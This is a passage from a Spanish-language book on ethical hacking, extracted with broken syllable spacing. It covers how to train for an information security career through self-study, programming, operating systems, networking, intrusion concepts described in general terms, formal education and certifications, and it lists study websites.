Santiago Cavanna, profesional de la seguridad de la información, me hizo el si-guiente comentario: “a veces es conveniente tambien cultivar el trabajocolaborativo entre varios especialistas, de esa manera, se cultiva la especialidad enprofundidad y luego se desarrolla un tipo de conocimiento que permite integrarseen un equipo de trabajo.” tambien citó del libro “El arte de resolver Problemas”(isbn:968-18-1294-8) “El que tiene que tomar una decisión trata de elegir un cursode acción que produzca el resultado deseado, uno de que sea eficaz respecto a loque el valora. Estos cursos de acción se conocen como efectivos. La efectividad esproducto de la eficiencia y el valor. El que busca el mejor y más efectivo curso deacción se dice que optimiza. El que busca una solución que sea suficientemente buena, se dice que satisface.”

19

La di fe ren cia en tre ser efi caz y efi cien te con sis te en que el pri me ro só lo cum ple conel ob je ti vo, mien tras que el se gun do no só lo lo cum ple, si no que lo ha ce ge ne ran do elme nor gas to de re cur sos (ya sea tiem po, di ne ro, he rra mien tas o per so nal in vo lu cra do).

Efi caz o efi cien te

Hacking Etico - [PDF Document] (23)

Whitehat. En www.w hi te hat sec .com hay do cu men tosen in glés acer ca de vul ne ra bi li da des y téc ni cas muy in te re san tes.

RE CUR SOS PA RA EL ES TU DIOLos mo ti vos por los que al guien pue de lle gar a de di car se al et hi cal hac king son va -ria dos, y al gu nos gé ne ros pue den des ta car se más que otros. Por un la do, po de mosmen cio nar aque llos que la ven co mo una in te re san te ra ma de la in for má ti ca denues tros tiem pos, o que ne ce si tan co no cer la por que su po si ción en el tra ba jo así selos de man da. Tam bién exis ten quie nes lle ga ron has ta aquí por su pa sión tem pra nao más re cien te, ha cia los sis te mas co mo hob bie. Tam po co fal tan quie nes vie ron al -gu na pe lí cu la y se fas ci na ron con los per so na jes del ti po hac ker lla ma dos Ze roCool o Acid Burn. Por úl ti mo, existen aque llos que de sean ge ne rar y ob te ner ga -

20

Si que re mos apren der in glés de for ma no pre sen cial u ob te ner cer ti fi ca cio nes in ter na -cio na les, po de mos vi si tar si tios co mo Ro set taS to ne (www .ro set tas to ne .com), Pims leur(www .pims leu rap proach .com), Uni ver sity of Cam brid ge (www .cam brid gee so l.org),IELTS (ww w. ielt s.org), Eu ro Talk (ww w.eu ro talk .co.uk) y Bu lats (www .bu lat s.org).

Cur sos de in glés

Hacking Etico - [PDF Document] (24)

nan cias co mer cia li zan do pro duc tos o ser vi cios re la cio na dos con la ma te ria.Ló gi ca men te, no to dos los que in gre san en el te ma lo tran si tan con la mis ma for ma -ción, ya sea aca dé mi ca, for mal o au to di dac ta, sal vo en la eta pa bá si ca de edu ca ción.Qui zá sea és te el úni co pun to en el que pue den al can zar cier to gra do de si mi li tud oequi li brio en la pre pa ra ción. En cuan to al res to de las eta pas, esa pre pa ra ción es de -ma sia do di fu sa por el pro ble ma de mo de lo edu ca cio nal. Por tal mo ti vo, la for ma ciónso bre el te ma es tá más li ga da al as pec to au to di dac ta y de ex pe rien cia que a un mo de -lo de ca rre ra fo ca li za do y es pe cial men te di se ña do. Los re cur sos de for ma ción re co -men da dos que ve re mos en es te ca pí tu lo es tán di vi di dos en cua tro eta pas fun da men -ta les:

• For ma ción bá si ca.• Edu ca ción au to di dac ta.• Edu ca ción for mal.• Tra ba jo & prác ti ca: ex pe rien cia.

For ma ción bá si ca

Es muy pro ba ble que la ma yo ría de los lec to res de es te li bro ha yan pa sa do por es taeta pa jun to a edu ca do res, pa dres o tu to res. Es ta eta pa ini cial es la ba se de una tem -pra na edu ca ción. Por más ab sur do que pa rez ca, es te ti po de for ma ción in te lec tual bá -si ca tie ne cla ra in ci den cia en el de sem pe ño de un pro fe sio nal de sis te mas, más allá dela es pe cia li dad que és te eli ja cuan do sea adul to. En es ta eta pa po de mos men cio nar:

• La fa mi lia y el co le gio co mo pri me ros con tac tos con la in for má ti ca for mal e in -for mal. Es tí mu los, am bien te, in tro duc ción en las ma te má ti cas.

• El es tu dio de idio mas co mo el in glés, fundamental en in for má ti ca pa ra la in ter -pre ta ción de ma nua les y la co mu ni ca ción en lis tas de co rreo.

• Años tem pra nos en los que se alien ta a so cia li zar, ju gar en equi pos, par ti ci par deac tos y ha cer amis ta des.

• Ju gar al aje drez co mo de sa rro llo de la ló gi ca es tra té gi ca y tác ti ca.• Jue gos de in ge nio co mo es tí mu lo de ca pa ci da des ana lí ti cas y re so lu ción de pro ble -

21

In ter net es una fuen te ina go ta ble de re cur sos. Si que re mos me jo rar nues tra ca pa ci dade in ge nio me dian te jue gos, po de mos in gre sar en si tios como www.m le vi tus .com, www -.jue gos dein ge nio.org, www .pum bo .co m/in dex.php?g=2 y www .men sa.es /jue gos men -sa /jue gos.html.

Jue gos de in ge nio

Hacking Etico - [PDF Document] (25)

mas.• In cen ti vo del há bi to de la lec tu ra, que da rá cier ta fa ci li dad pa ra re dac tar y co mu -ni car se me jor con di fe ren tes ti pos de per so nas, y ayu da rá al de sa rro llo de la crea -ti vi dad y de la ima gi na ción.

• Por úl ti mo, al go muy im por tan te: co no cer lo mo ral men te co rrec to.

Ajedrez. En el si tio ww w.a je drez 21.com,en con tra mos re cur sos de di ca dos al apren di za je del aje drez.

Edu ca ción au to di dac ta

Ser au to di dac ta sig ni fi ca es tu diar por cuen ta pro pia. Per mi te la elec ción pro pia y esla que más per fi la rá al fu tu ro pro fe sio nal de se gu ri dad, ya que se co mien za es tu dian -

22

El ¡Ho la mun do! es co no ci do por ser lo pri me ro que se in ten ta en cual quier len gua jede pro gra ma ción. Es ta prác ti ca con sis te en im pri mir esas dos pa la bras en la pan ta llacuan do es eje cu ta do el pe que ño pro gra ma que se de sa rro lla. Po de mos en con trar másin for ma ción y ejem plos en htt p://es .wi ki pe dia.org /wi ki /Ho la _mun do.

Hola mundo

Hacking Etico - [PDF Document] (26)

do por gus to, afi ni dad y li bre elec ción del ma te rial. Pa ra ser un buen pro fe sio nal ense gu ri dad in for má ti ca o de la in for ma ción, con vie ne apren der es te ti po de co sas:

• Apren der a pro gra mar y ana li zar pro ble mas ló gi ca men te. • Ad mi nis trar sis te mas ope ra ti vos di fe ren tes y con fi gu rar los.• Apren der acer ca de net wor king y pro to co los de co mu ni ca ción.• Co no cer se gu ri dad in for má ti ca y de la in for ma ción, prin ci pal men te las téc ni casmás usua les de in tru sión y los mé to dos de ges tión.

¿Có mo se apren de a pro gra mar? Sim ple men te pro gra man do. Ya sea des de ce ro(con el fa mo so ¡Ho la mun do!) o mi ran do có di go fuen te aje no y tra tan do de in ter -pre tar qué fue lo que in ten tó ha cer el au tor, pen sar có mo po dría ha ber lo he cho me -jor y lue go op ti mi zar lo. Es tas pre mi sas son vá li das ba jo cual quier idio ma de pro -gra ma ción, que no son más que co man dos, de ter mi na da sin ta xis (for ma de es cri -bir lo) y ló gi ca pa ra la re so lu ción del pro ble ma. Aun que re quie re de di ca ción, pue -de pro gra mar quien se lo pro pon ga y ha ga el sa cri fi cio. La di fe ren cia en ca li dad lada rá el es fuer zo y la ló gi ca crea ti va de ca da uno, que nos lle va rá a ha cer lo mis moen diez o en mil lí neas de có di go, o bien en diez o en mil ho ras de tra ba jo.Pro gra mar o sa ber in ter pre tar có di go fuen te se rá de gran uti li dad pa ra mu chas co -sas re la cio na das con la se gu ri dad in for má ti ca. Nos ayu da rá a so lu cio nar pro ble masden tro de un sis te ma (con pro gra ma ción bash, scrip ting y WSH en en tor nos Li nuxo Win dows), a cons truir, o mo di fi car, prue bas de con cep to de cual quier ti po y ar -qui tec tu ra o len gua je. Tam bién nos ser vi rá pa ra rea li zar ad mi nis tra ción avan za dame dian te scripts, ha cer y mo di fi car he rra mien tas o apli ca cio nes y au di tar có di gopro pio o aje no. Por otro la do, nos per mi ti rá mi grar có di go de un idio ma a otro,mo di fi car open sour ce (có di go fuen te de sis te mas Li nux por ejem plo), ha cer in ge -nie ría in ver sa de par ches, mal wa re o apli ca cio nes y de pu rar, en tre otras co sas. Cones tos co no ci mien tos, tam bién po dre mos tes tear apli ca cio nes on li ne o en red de for -ma lo cal, op ti mi zar to do ti po de có di go, au to ma ti zar se cuen cias de co man dos, ha -cer re por tes, mo ni to reos, flu jo de da tos o ac ce sos y pro te ger có di go me dian te el em -pa que ta mien to de bi na rios, por ejem plo. Co mo ve mos, las po si bi li da des son mu -chas.

23

Si de sea mos crear dia gra mas de for ma ma nual, en las li bre rías po de mos con se guir di -ver sas plan ti llas pa ra es to se gún la nor ma IRAM 36002. Al es ti lo de los sten cils, es tasplan ti llas plás ti cas tie nen di fe ren tes uti li da des y apli ca cio nes, co mo po de mos ver enwww .plan tec .co m.ar /lo cal-cgi /ver ca te go ria.c gi ?co di go=9.

Dia gra ma ción sin PC

Hacking Etico - [PDF Document] (27)

No es ne ce sa rio apren der to dos los len gua jes, ya que son de ce nas y po dría lle var -nos mu chos años sin que al can ce mos a dar les una real apli ca ción. Es muy im por -tan te que un buen pro gra ma dor, una vez ex pe ri men ta do, pro gra me de mo do se gu -ro.Una tem pra na y bue na prác ti ca, que hoy no se acos tum bra a es tu diar, es la dia gra -ma ción ló gi ca, vá li da tam bién pa ra ini ciar se en al gu nos len gua jes de pro gra ma ción(del tipo batch) ya que fa ci li ta el de sa rro llo de la ló gi ca se cuen cial.

Diagrama. En es te dia gra ma hecho a mano, que se tie nenque mos trar en pan ta lla nú me ros en tre 1 y 100. Con di ción fal sa (F),

con di ción ver da de ra (V). El grá fi co de rom bo equi va le a un IF o de ci sión.

24

De la mis ma ma ne ra que en los fo ros, pe ro me dian te co rreos elec tró ni cos, po de mos ob -te ner ayu da en las lis tas de co rreo. Pa ra en con trar es tas, in gre sa mos en si tios co mo ww -w.e gru pos .net, http ://groups .goo gle.es, htt p://es .groups .ya hoo .com o http ://groups .blog -dig ger .com y uti li zamos pa la bras cla ve re la cio na das con el te ma.

Lis tas de co rreo

Hacking Etico - [PDF Document] (28)

Pa ra ayu dar nos con nues tro apren di za je, po de mos re cu rrir a In ter net, tan to a si -tios co mo a fo ros y lis tas de co rreo. Por ejem plo, Psi cofxp .com es la ma yor co -mu ni dad on li ne en es pa ñol y cuen ta con ex ce len tes fo ros de di ca dos a tec no lo gía.Tan to en pro gra ma ción (www.p si cofxp .com /fo rums /pro gra ma cion.313) co moen otras áreas IT, es te si tio cuen ta con gen te dis pues ta a ayu dar nos de ma ne ra de -sin te re sa da. Re cu rrir a fo ros de pro gra ma do res es una muy bue na al ter na ti va, enespecial cuan do recién comenzamos a pro gra mar de mo do au to di dac ta, ya quepo de mos pu bli car nues tra con sul ta y es pe rar a que pro gra ma do res más ex pe ri -men ta dos nos res pon dan o guíen has ta la so lu ción.

Psicofxp. En www.p si cofxp .com, po de mosen con trar mu cha ayu da cuan do co men za mos a pro gra mar.

Ade más, en In ter net po de mos en con trar re po si to rios de có di go y tu to ria les de to -dos los len gua jes exis ten tes. Vea mos al gu nos si tios.

25

Si que re mos apren der más so bre los sis te mas ope ra ti vos FreeBSD, NetBSD yOpenBSD, po de mos vi si tar las si guien tes di rec cio nes: ww w.un deadl y.org, ww w.el de -mo nio.org, www .freebs d.org.mx y www.bsd frea k.org. En es tos si tios, en con tra re mostu to ria les, no ve da des e in for ma ción com ple men ta ria que nos será de utilidad.

FreeBSD, NetBSD y OpenBSD

Hacking Etico - [PDF Document] (29)

LEN GUA JE URLPla net Sour ce Co de www .pla net-sour ce-co de .comLi nux Scrip ting www .freeos .com /gui des/lsstPro gra ma ción Bash xin fo .sour ce for ge .net /do cu men tos/bash-scrip ting /

bash-script-2.0.htmlWin32 Scrip ting http://c was hing ton .ne treach .net As sembly www.cs n.u l.ie /~darks ta r/as sem bler /ma nualPyt hon www.pyt hon .co m.arC www.c ti.ui b.es /ME SIN FO /MA NUALS /CursC.pdf C++ www .con cla se .net/cPerl http ://per le nes pa nol .ba boon soft wa re .com Vi sual Ba sic www.vb-mun do .com PHP www.php .net ASP www .so loasp .co m.ar Ja vas cript www .ga ma rod .co m.ar

Programación. Si tios en los que po de mos en con trarma te rial so bre dis tin tos len gua jes de pro gra ma ción.

Apren der acer ca de los sis te mas ope ra ti vos

Los gran des es ce na rios sue len es tar com pues tos por di fe ren tes com po nen tes o ser -vi do res ba jo pla ta for mas co mo Unix, So la ris, Li nux, FreeBSD, OpenBSD o Win -dows Ser ver. Por lo tan to, no es re co men da ble de di car se só lo a co no cer y ad mi nis -trar una pla ta for ma úni ca si es ta mos de ci di dos a abor dar la se gu ri dad in for má ti caen cues tio nes téc ni cas (a me nos que de see mos es pe cia li zar nos y de le gar el res to deltra ba jo) o bien for mar par te de un equi po.Los che queos de se gu ri dad se pue den lle var a ca bo des de di fe ren tes sis te mas ope -ra ti vos ya que no to dos ofre cen las mis mas con di cio nes de tra ba jo, ver sa ti li dad yhe rra mien tas. Para mejorar nuestros conocimientos, un buen co mien zo es apren -der a ad mi nis trar es tos sis te mas ope ra ti vos, co no cer có mo fun cio nan, su con fi gu -ra ción se gu ra y de red, su es truc tu ra in ter na, los co man dos usua les y los avan za dos,los con tro les que tie ne, sus logs o ar chi vos de au di to ría, có mo ins ta lar apli ca cio nesen él y tam bién se tear las, có mo ac tua li zar lo, par chear lo o mo di fi car lo, y ver la es -truc tu ra y las li mi ta cio nes en los pri vi le gios de ca da gru po de usua rios.Lógicamente, pa ra apren der a ad mi nis trar un ser vi dor, ya sea Unix, Li nux o Win -dows, pri me ro hay que ins ta lar lo. Lue go se de ben uti li zar sus co man dos y es tu diarsu es truc tu ra in ter na, ges tio nar los usua rios del sis te ma y sus di fe ren tes permisos,co no cer ca da ser vi cio na ti vo y des ha bi li tar aque llos que sean in ne ce sa rios, crear re -la cio nes de con fian za en tre otros com po nen tes en red a tra vés de di ver sos mé to -dos. Tam bién, au di tar sus ar chi vos de re gis tro, co no cer bien los logs y cuál es la in -

26

Hacking Etico - [PDF Document] (30)

for ma ción re le van te que se de po si ta en ellos, in ten tar el fil tra do de pro to co los y co -ne xio nes ex ter nas, man te ner ac tua li za do to do lo po si ble (in clui do el ker nel en el ca -so de Li nux), de ter mi nar qué co sas no pue den de jar se por de fec to (co mo pass -words, usua rios, apli ca cio nes, paths o di rec to rios, pri vi le gios, con fi gu ra cio nes o ar -chi vos), pro bar apli ca cio nes y tec no lo gías usua les co mo apa che, mysql u openssl.De ese mo do, se co mien zan a apli car los mé to dos de har de ning, que sig ni fi ca vol -ver más se gu ro el ser vi dor, y se van ad qui rien do no cio nes de ad mi nis tra ción avan -za da. A su vez, esto nos ayuda a co no cer las ca rac te rís ti cas dé bi les de un sis te mains ta la do por de fault, lo que nos per mi ti rá re co no cer las fá cil men te en los fu tu roses ce na rios en los que es te mos in vo lu cra dos. La ins ta la ción y la ad mi nis tra ción se gu ras de ser vi do res lle va da a ca bo de un mo doreal men te efi cien te, ayu da rá a pre ve nir la in tro mi sión en el sis te ma (a tra vés del sis -te ma ope ra ti vo) de al guien no au to ri za do. De to dos mo dos, un sis te ma ope ra ti voes ape nas una puer ta en tre la de ce na de po si bi li da des.

BSD. En www.bs dar gen ti na .co m.ar,en con tra re mos fo ros y di ver so ma te rial acer ca de la fa mi lia BSD.

An te al gu na du da pun tual re la cio na da con los sis te mas ope ra ti vos, de be mos re cor darque en In ter net se en cuen tran lis tas de co rreo de usua rios, mai lings ofi cia les de losde sa rro lla do res, mai lings de em pre sas con pro duc tos afi nes (por ejem plo eE ye), fo -ros de dis cu sión, ca na les IRC, blogs, FTP, cur sos, li bros, e-zi nes, mo no gra fías, gru -pos de usua rios, aso cia cio nes, de sa rro lla do res, de pó si tos de apli ca cio nes y có di go fuen te.

27

Hacking Etico - [PDF Document] (31)

Apren der acer ca de net wor king

El co no ci mien to de net wor king y to do aque llo re fe ren te a re des (co mo pro to co losy co nec to res, rou ting y swit ching, entre otras cosas) es bá si co pa ra el di se ño y ladia gra ma ción de en tor nos de una or ga ni za ción, pe ro re sul ta fun da men tal pa ra unfu tu ro pro fe sio nal de et hi cal hac king.

RFC. Los RFC (Re quest For Com ments) son los es tán da res que de fi nenca da uno de los com po nen tes de In ter net. Con sis ten en la lec tu ra bá si ca y muy

de ta lla da de los pro to co los uti li za dos. Los po de mos ver en es pa ñol en www.rfc-es.org.

Es to nos per mi ti rá no só lo lle var a ca bo el che queo de se gu ri dad e in ter pre tar elma peo de los com po nen tes, si no tam bién de ter mi nar exac ta men te el flu jo de in for -ma ción, la dis po si ción de las ofi ci nas y sus com po nen tes in for má ti cos, las me di dasde pre ven ción en el trá fi co de red, el al ma ce na mien to de da tos, su ac ce so, su pro -ce so o pos te rior en ru ta mien to, me di das téc ni cas de con tin gen cia y con tro les.Al mis mo tiem po, nos per mi ti rá es tar ca pa ci ta dos pa ra re co men dar los com po -nen tes ne ce sa rios de se gu ri dad o co nec ti vi dad co mo DMZ, fi re walls, crip to sis te -mas, rou ters, switchs, fil tra dos va rios, IDS, da ta ba ses, ser vi do res se gu ros de ar chi -vos, ser vi do res de logs, ser vi do res de re pli ca ción, de ter mi na dos en la ces ci fra dos,VPNs, VLANs, uni da des de lo gueo se gu ro, ca blea do es truc tu ral blin da do, et cé te -ra.Entre todo el material disponible, lo prin ci pal es co no cer có mo se co mu ni can es -tos ele men tos (su ma do a los ser vi do res y ter mi na les) en tre sí, sus ca pas, sus pro to -

28

Hacking Etico - [PDF Document] (32)

co los, su con fi gu ra ción y las nor mas téc ni cas de ca da uno.

Visio. La apli ca ción Vi sio, del pa que te Of fi ce de Mi cro soft, es muy uti li za dapa ra plas mar de for ma grá fi ca la dis po si ción de to dos los com po nen tes de un es ce na rio

in for má ti co. Tam bién sir ve pa ra dia gra ma ción ló gi ca y or ga ni gra mas, en tre otros grá fi cos.

Co no cer téc ni cas bá si cas de in tru sión

“Cuan do es tás em pe zan do, no ne ce si tas he rra mien tas. Ése es elmo do en que te vol ve rás un script kid die. Lo que ne ce si tas es en -ten der. Ne ce si tas sa ber có mo tra ba jan los sis te mas, qué erro respue den co me ter sus pro gra ma do res o ad mi nis tra do res pa ra queés tos se vuel van vul ne ra bles y có mo esos erro res pue den ser ex -plo ta dos de mo do que se pue da in gre sar en el sis te ma.Una vez que en tien das qué es lo que es tás ha cien do, es ta rás pre -pa ra do pa ra ele gir la he rra mien ta co rrec ta pa ra la cir cuns tan ciaco rrec ta. Una vez que has ele gi do la he rra mien ta, és ta só lo ha rátu pro ce so más efi cien te”. De rek Foun tain (En: Bug traq)

An tes de ha blar de es tas téc ni cas, de be mos sa ber qué se en tien de por in tru sión.Pa ra de fi nir lo de un mo do sim ple, sig ni fi ca lo grar el ac ce so a re cur sos de un sis te -ma sin te ner la au to ri za ción de su due ño o de quien lo con tro la. Quien lle ve a ca -bo es te ti po de ac ce sos no per mi ti dos es li sa y lla na men te un in tru so, sea co mo

29

Hacking Etico - [PDF Document] (33)

fue re que lo ca ta lo guen los me dios, las au to ri da des o el res to de la gen te.Aun que exis ten mu chas for mas de in tru sión, aquí ve re mos ejem plos del ám bi to in -for má ti co, es de cir, el in gre so de ter ce ros no au to ri za dos en la in for ma ción (al ma -ce na da o en flu jo) en es ta do di gi tal de una or ga ni za ción. De to das ma ne ras, de be -mos te ner en cuen ta que en el sis te ma de cual quier or ga ni za ción, los da tos vi ta lessue len es tar en una am plia ga ma de so por tes, co mo pa pel, me mo rias di ver sas, cin -tas, au dio, pi za rras, pa ne les, on das de ra dio, vi deo, dia po si ti vas y más. Va rios de es -tos me dios son lla ma dos fun gi bles por que se ago tan con su uso, co mo las cin tas oel pa pel.El in tru so pue de lo grar ac ce so no au to ri za do a in for ma ción de mo do:

• Fí si co: in si tu, es tan do fren te a la má qui na.• Re mo to, lo cal o am bos a la vez.• Por ca ble: vía In ter net o lí nea te le fó ni ca.• Por on das: wi re less.• Por ra dia ción: ea ves drop ping.• Por vis ta u oí do: a dis tan cia.• A tra vés de una in ter faz grá fi ca.• A tra vés de un in tér pre te de co man dos.• A tra vés de un in tér pre te de co man dos a cie gas, sin ver el re sul ta do de lo que seeje cu tó en el ser vi dor re mo to.

En trar no so lo sig ni fi ca in tro du cir el usua rio y la cla ve en un de ter mi na do ser vi ciode au ten ti fi ca ción re mo ta co mo tel net, ssh, ter mi nal ser vi ce, rlo gin, ftp, y to dosaque llos que so li ci ten in gre sar va li da ción. Pue de sig ni fi car la rea li za ción de una es -ca la da, que con sis te en una su ce sión de ac tos que lle van a lo grar ca da vez ma yoral can ce den tro del sis te ma pa ra, fi nal men te, ob te ner una cuen ta de ele va dos pri vi -le gios o el pro pó si to que se ha ya im pues to el eje cu tor. Por ejem plo, en viar poremail o ftp de ter mi na do ar chi vo o da ta ba se al ex te rior, agre gar un usua rio de pri -vi le gios en el sis te ma o, sim ple men te, en trar y ocul tar su ras tro pa ra que en el fu -tu ro se pue da uti li zar ese ser vi dor pa ra otros pro pó si tos. Es to po dría lle var me seso mi nu tos, y las más va ria das téc ni cas, ya sea a tra vés del mis mo sis te ma ope ra ti vo,de al gu na apli ca ción o de al gún des cui do del ad mi nis tra dor (ha bla mos siem pre deser vi do res con ad mi nis tra dor y no de sim ples ter mi na les de usua rios con Win dowsXP).Sin du das, un in tru so se apro ve cha rá de los des cui dos hu ma nos, ya que to dos loscom po nen tes del sis te ma fue ron de sa rro lla dos, se tea dos u or ga ni za dos por per so -nas; por eso tie nen fa len cias que son po ten cial men te ex plo ta bles. En ton ces, ¿cuáles la me jor for ma de apren der téc ni cas de in tru sión? En prin ci pio, co no cer el ob je -ti vo, em pe zan do por el sis te ma ope ra ti vo (con es to no ha ce mos re fe ren cia a ele men -tos del ti po Win dows 98, si no a Li nux, la fa mi lia BSD y la fa mi lia Win dows Ser ver).

30

Hacking Etico - [PDF Document] (34)

Los des cui dos de ad mi nis tra ción son di fí ci les de des cu brir y ex plo tar si no se co no cepro fun da men te el sis te ma ope ra ti vo o la apli ca ción en sí. Ima gi ne mos el tiem po quelle va ría apren der, so bre la mar cha de un che queo, las ca rac te rís ti cas de un sis te ma ope -ra ti vo (y sus apli ca cio nes) o to dos los com po nen tes de un es ce na rio.Hay que es tar in for ma do acer ca de las nue vas vul ne ra bi li da des o des cu brir las poruno mis mo si se tie ne el tiem po pa ra ha cer lo, siendo muy útil la ha bi li dad de en -con trar las y po der pro gra mar su ex ploit (prue ba de con cep to). Tam bién es bue nosa ber có mo iden ti fi car un sis te ma y re co no cer si es po ten cial men te ex plo ta ble sumo de lo, ver sión o es ta do. Pa ra ello, po de mos re cu rrir a los in con ta bles li bros ywhi te pa pers, ho ney pots, war ga mes, con cur sos, lis tas de co rreo pro fe sio na les, e-zi -nes y fo ros se rios. Ade más po de mos mon tar una red ho ga re ña pa ra prac ti car, má -qui nas vir tua les en VVmm wwaa rree o ha cer lo en el tra ba jo si es po si ble.

IP. Hi de-Ip-Brow ser (www .hi de-ip-brow ser .com) es unsoft wa re que per mi te man te ner el ano ni ma to al na ve gar si tios y al pos tear

en fo ros. Es to lo rea li za me dian te la elec ción de di fe ren tes ser vi do res proxys.

So bre los cur sos que se ofre cen en In ter net, ya sean de se gu ri dad o de et hi cal hac -king, hay que te ner en cuen ta que por es tos días, la Web es ma si va y hay mu chos

31

En estas lis tas de co rreo nos ayu da rán a encontrar res pues tas a nues tras pre gun tas:www .se gu-in fo .co m.ar, en es pa ñol (fo ro si); ww w.is saar ba.org, en es pa ñol (IS SAAr BA);www .se cu rity fo cus .com, en in glés (Bug traq /Se cu rity Ba sics); ww w.in fo sec new s. org,en in glés (ISN); ww w.e lis tas .ne t/lis ta/nnl, en es pa ñol (NNL News let ter).

Listas de Correo

Hacking Etico - [PDF Document] (35)

em pre sa rios que brin dan du do sos cur sos (ob so le tos o in com ple tos) pa ra así apro -ve char se de la ig no ran cia de la gen te y ga nar di ne ro. Esto no significa que to doslos cur sos son ma los, pe ro en gran par te son una pér di da de re cur sos. Pa ra no co -rrer ries gos, es bue no to mar es tos re cau dos:

1. Den tro de una lis ta de co rreo de se gu ri dad, pre gun tar a los pro fe sio na les cuál se -ría el cur so ade cua do se gún nues tro ni vel, in te rés, fin o re cur sos eco nó mi cos.

2. Eva luar, tras ha ber ha bla do con al guien que ha ya cur sa do allí, cuá les fue ron loscos tos to ta les, las ho ras, el al can ce, si tie nen pro gra ma o en tre gan ma te rial de es -tu dio, cuál es el se gui mien to del apren di za je, qué cla se de tí tu lo o cer ti fi ca do en -tre gan al fi na li zar y qué re co no ci mien to tie ne és te en el mer ca do la bo ral lo cal omun dial. Tam bién se ría bue no sa ber si la per so na que nos in for ma que dó con -for me y en qué as pec tos el cur so fue flo jo, o no se cum plió con lo pro me ti do.

3. Com pro bar la ex pe rien cia real en se gu ri dad de quien o quie nes im par ten el cur -so o el pro gra ma de es tu dio que es tá por pa gar se. No es tá mal pe dir re fe ren ciaso cu rrí cu lum vi tae, y en lo po si ble con vie ne ha cer lo de mo do for mal, por te lé -fo no o en la ofi ci na mis ma.

Edu ca ción for mal

Hoy en día, no exis te una ca rre ra de gra do for mal de ni vel uni ver si ta rio (de va rios añosde du ra ción) so bre se gu ri dad in for má ti ca que com pren da, en su con te ni do, al et hi calhac king de mo do prác ti co (hands on). Ape nas hay al gu nos post gra dos, cer ti fi ca cio nesy tec ni ca tu ras re la cio na das. Sí hay ca rre ras co mo ana lis ta de sis te mas, in ge nie ría en sis -te mas, li cen cia tu ra en sis te mas, doc to ra dos, es pe cia li za cio nes y maes trías, que sonbue nos for ma do res de ba se pa ra la ma te ria. Allí se es tu dian las tec no lo gías com pren -di das en los sis te mas, pro to co los, sus pro ce di mien tos, téc ni cas, di se ño y or ga ni za ción.El es tu dio for mal, de al gu na ma ne ra, mo de la rá to do lo que apren da mos de ma ne -ra au to di dac ta, y no só lo en re la ción con los con te ni dos de las ma te rias, si no tam -bién por que en fren tar nos a nu me ro sos exá me nes es cri tos y ora les nos da rá cier totem ple an te pe que ños de sa fíos rea les, de re so lu ción ana lí ti ca.

32

Es re co men da ble leer li bros de Auer bach, la se rie Hac king Ex po sed, de Mc Graw-Hill,de Sy bex, de O’Reilly, de CRC Press, de Syn gress, de Ac tual tests, de Learn key, to doslos de te má ti ca CISSP, los 31 ejem pla res de Hackx crack y hac kin9. Ade más, es in te re -san te ver: www .zip si tes .ru /book s/e doc s/e docs _list.php y ww w.in se cu re mag .com

Lec tu ras adi cio na les

Hacking Etico - [PDF Document] (36)

Co mo si fue ra po co, también se ob tie nen otros pun tos de vis ta que servirán pa -ra abor dar pro ble mas, se co no cen co le gas que en al gu nos as pec tos pue den sermás ex pe ri men ta dos, se prac ti ca en la bo ra to rios o en tor nos de red, se for mancon tac tos de tra ba jo y es tu dio, se es cu chan anéc do tas y ex pe rien cias muy va lio -sas por par te de pro fe so res o com pa ñe ros, entre otras cosas. La edu ca ción for mal es muy te ni da en cuen ta por las con sul to ras de RRHH gra -cias al tí tu lo que brin da. Mu chos au to di dac tas han si do re cha za dos por no po -seer tí tu lo al gu no, sin siquiera te ner la po si bi li dad de de mos trar sus ha bi li da desaun sien do ex ce len tes pen tes ters y ana lis tas.En cuan to a las cer ti fi ca cio nes de se gu ri dad, hay más de 20, co mo po de mos veren http ://cer ti fi ca tio n.a bout .co m/od /se cu rity cert s/a/sec cer tes sentls.htm. Al gu -nas son con si de ra das co mo re qui si tos en de ter mi na das or ga ni za cio nes por su de -par ta men to de re cur sos hu ma nos, pe ro co mo to do tí tu lo, pue den no ser el ver da -de ro re fle jo de la ca pa ci dad y pre pa ra ción de quien lo po see.

ISC. (ISC)2 es re co no ci da en to do el mun do porcer ti fi car pro fe sio na les CISSP. Fun da da en 1989, pa sa ron por

sus exá me nes más de 50.000 pro fe sio na les. Su di rec ción es ww w.is c2.org.

En la pre pa ra ción de es tos exá me nes, sue len apren der se co sas in te re san tes o to tal men -te des co no ci das, y es re co men da ble que to do aquel in te re sa do en su mar ex pe rien cias

33

En http ://com mu nity .co rest .com /~ge ra/In se cu re Pro gram ming, po de mos en con trarejer ci cios de pro gra ma ción avan za da re la cio na da a fa llas. Es to es útil ya que, cuan tomás prac ti que mos (pro gra me mos), me jor se rán nues tras ha bi li da des pa ra re sol verpro ble mas me dian te pro gra ma ción.

Ejer ci cios de pro gra ma ción

Hacking Etico - [PDF Document] (37)

en se gu ri dad to me es tos exá me nes de cer ti fi ca ción por una cues tión for mal. Es to leper mi ti rá ser un me jor can di da to en las se lec cio nes de los de par ta men tos de re cur soshu ma nos. A con ti nua ción, po de mos leer par te de las de cla ra cio nes de Iván Ar ce (CTO deCo re Se cu rity Tech no lo gies) acer ca de la for ma ción del pro fe sio nal de se gu ri dad, ymás pre ci sa men te so bre las cer ti fi ca cio nes de se gu ri dad. La en tre vis ta com ple ta sepue de leer en ww w.a ci s.org .co /fi lead min /Re vis ta_96/en tre vis ta.pdf (Gra ciasIván por au to ri zar su re pro duc ción).

- ¿Có mo se ma ne jan las cer ti fi ca cio nes, cuál es su al can ce y apli ca bi li dad realen las em pre sas?

Di fí cil men te, una cer ti fi ca ción de se gu ri dad es un in di ca ti vo de la ca pa ci dad,ex pe rien cia o co no ci mien to real de un in di vi duo en la ma te ria. A lo su mo, esun in di ca ti vo de la exis ten cia de al gún ti po de for ma ción bá si ca en el te ma, si -guien do la pau ta del pro gra ma par ti cu lar que pue de ser ma lo, me dio cre o me -dia na men te bue no.Un ex per to en se gu ri dad in for má ti ca no se for ma co mo re sul ta do de la acu mu -la ción de cur sos y cer ti fi ca cio nes, si no de la acu mu la ción y la apli ca ción de unadis ci pli na de tra ba jo y de es tu dio ad qui ri da en otro con tex to -es cue la, uni ver -si dad, tra ba jo, ca sa, etc.-, com bi na da con las ca pa ci da des crea ti vas, de in no va -ción, per se ve ran cia y adap ta ción, pro pias de ca da in di vi duo.No obs tan te, eso no im pi de que las cer ti fi ca cio nes se adop ten y se usen co moun in di ca dor de ca pa ci dad pro fe sio nal y prin ci pal men te co mo un me ca nis model mer ca do la bo ral y de ca pa ci ta ción pro fe sio nal, pa ra 